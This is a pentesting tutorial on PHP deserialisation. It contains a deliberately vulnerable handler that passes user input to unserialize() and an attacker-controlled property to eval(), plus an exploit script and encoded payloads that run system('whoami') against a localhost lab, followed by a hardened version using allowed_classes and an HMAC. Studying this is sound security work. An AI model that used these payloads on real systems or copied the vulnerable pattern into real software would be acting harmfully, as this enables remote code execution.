The Pentesting Guide

PHP deserialisation

Introduction

First of all, let's explain what serialisation and deserialisation mean. Serialisation transforms an object from an object-oriented programming language such as Java, Python or PHP into a format that can be stored or transferred. Deserialisation turns serialised objects read from files or the network back into ordinary programming objects.

An attacker who can manipulate serialised objects could change the application's logic, cause a denial of service, or execute arbitrary code when those objects are deserialised.

Proof of Concept

When you control a serialised object that is passed into unserialize(), you control the properties of the created object. You may also be able to hijack the flow of the application by controlling the values used by magic methods that PHP invokes automatically, such as __wakeup() or __destruct().

In this proof of concept, the vulnerable code receives a serialised object through the GET parameter r, unserialises it and, if the result is an array, prints its first two values. However, an attacker can instead supply a serialised PHPObjectInjection object carrying their own inject property: its value is passed to eval() by the __wakeup() method, which PHP calls automatically as soon as unserialize() has rebuilt the object.

Vulnerable code:

<?php
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        // Magic method: PHP calls __wakeup() automatically right after
        // unserialize() has rebuilt an object of this class
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject); // attacker-controlled string reaches eval()
            }
        }
    }
    if(isset($_REQUEST['r'])){
        // Raw user input goes straight into unserialize(): any class, any properties
        $var1=unserialize($_REQUEST['r']);
        if(is_array($var1)){
            echo "<br/>".$var1[0]." - ".$var1[1];
        }
    }
    else{
        echo ""; # nothing happens here
    }
?>

php -S localhost:8080 vuln.php

Exploit:

<?php
    // Same class name as on the server, so the serialised output is rebuilt as
    // that class; only the inject property matters, no methods are needed here
    class PHPObjectInjection{
        public $inject = "system('whoami');";
    }
    echo urlencode(serialize(array("vul","nerable"))); # Basic serialized data (intended use)
    echo "\n";
    echo urlencode(serialize(new PHPObjectInjection)); # Command execution via __wakeup()
?>
php exploit.php
# Intended use
a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D 
# Malicious use
O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D

Result:

As shown below, because the attacker could set the $inject property to a call to the whoami command, they gained RCE and learned which user runs the PHP service.

curl http://localhost:8080?r=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D
vul - nerable
curl http://localhost:8080?r=O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D
kali
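The hardened counterpart of the vulnerable handler, as an added example that is not part of the original page: it keeps the same array round-trip the application needs while making the object payload above harmless. Two independent controls are shown, unserialize() with allowed_classes set to false (available since PHP 7.0) and an HMAC over the serialised blob. SECRET_KEY, sign_payload() and load_payload() are names assumed for this demonstration, and the key value is a placeholder.

```php
<?php
// Added example (not from the original page): a hardened counterpart of the
// vulnerable handler above. Two independent controls:
//   1. unserialize() with 'allowed_classes' => false, so an attacker-supplied
//      O:... payload is rebuilt as __PHP_Incomplete_Class and the __wakeup()
//      or __destruct() of an application class never runs;
//   2. an HMAC over the serialised blob, so only data this server produced is
//      accepted at all.
// SECRET_KEY, sign_payload() and load_payload() are assumed names for this
// demonstration; the key value is a placeholder to be loaded from a secret store.

const SECRET_KEY = 'PLACEHOLDER-load-a-random-32-byte-key-from-a-secret-store';

// Server side: emit a tagged blob "<hex mac>.<base64 serialised data>" that the
// client hands back later (urlencode() it before placing it in a URL).
function sign_payload(array $data): string {
    $blob = serialize($data);
    $mac  = hash_hmac('sha256', $blob, SECRET_KEY);
    return $mac . '.' . base64_encode($blob);
}

// Server side: accept a blob only if its MAC verifies, and even then never let
// unserialize() instantiate application classes. Returns null on any failure.
function load_payload(string $param): ?array {
    $parts = explode('.', $param, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$mac, $b64] = $parts;
    $blob = base64_decode($b64, true);
    if ($blob === false) {
        return null;
    }
    // hash_equals() compares in constant time, so the MAC cannot be recovered
    // byte by byte through timing differences.
    if (!hash_equals(hash_hmac('sha256', $blob, SECRET_KEY), $mac)) {
        return null;
    }
    $value = @unserialize($blob, ['allowed_classes' => false]);
    // Anything other than the array shape the application expects (including a
    // smuggled object, which now arrives as __PHP_Incomplete_Class) is rejected.
    return is_array($value) ? $value : null;
}

// The class from the PoC, with __wakeup() reduced to a tell-tale message so the
// demonstration shows whether the magic method fires.
class PHPObjectInjection {
    public $inject;
    function __wakeup() {
        echo "__wakeup() ran - this line must never print\n";
    }
}

// 1. A legitimately signed array round-trips.
$signed = sign_payload(['vul', 'nerable']);
var_dump(load_payload($signed));            // array(2) { "vul", "nerable" }

// 2. The object payload from the PoC (constructed here; same bytes as the
//    exploit output once URL-decoded) fails the MAC check and is never parsed.
$forged = 'O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system(\'whoami\');";}';
var_dump(load_payload(str_repeat('0', 64) . '.' . base64_encode($forged)));  // NULL

// 3. Even with the MAC layer removed, allowed_classes => false keeps the class
//    from being instantiated, so __wakeup() does not run.
$obj = unserialize($forged, ['allowed_classes' => false]);
var_dump(get_class($obj));                  // string(22) "__PHP_Incomplete_Class"
```

Run it with php hardened.php: the signed array is returned, the forged blob yields NULL, and the tell-tale line from __wakeup() never prints. When the application only needs plain data rather than an object graph, json_encode()/json_decode() avoids the problem entirely, since JSON carries no class information and triggers no magic methods.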

References

Several exploits [PayloadAllTheThings]
PHP Object Injection [OWASP]
Exploiting PHP deserialization [Medium]
Deserialization Cheat Sheet
Exploiting insecure deserialization vulnerabilities
Magic methods
What is Phar Deserialization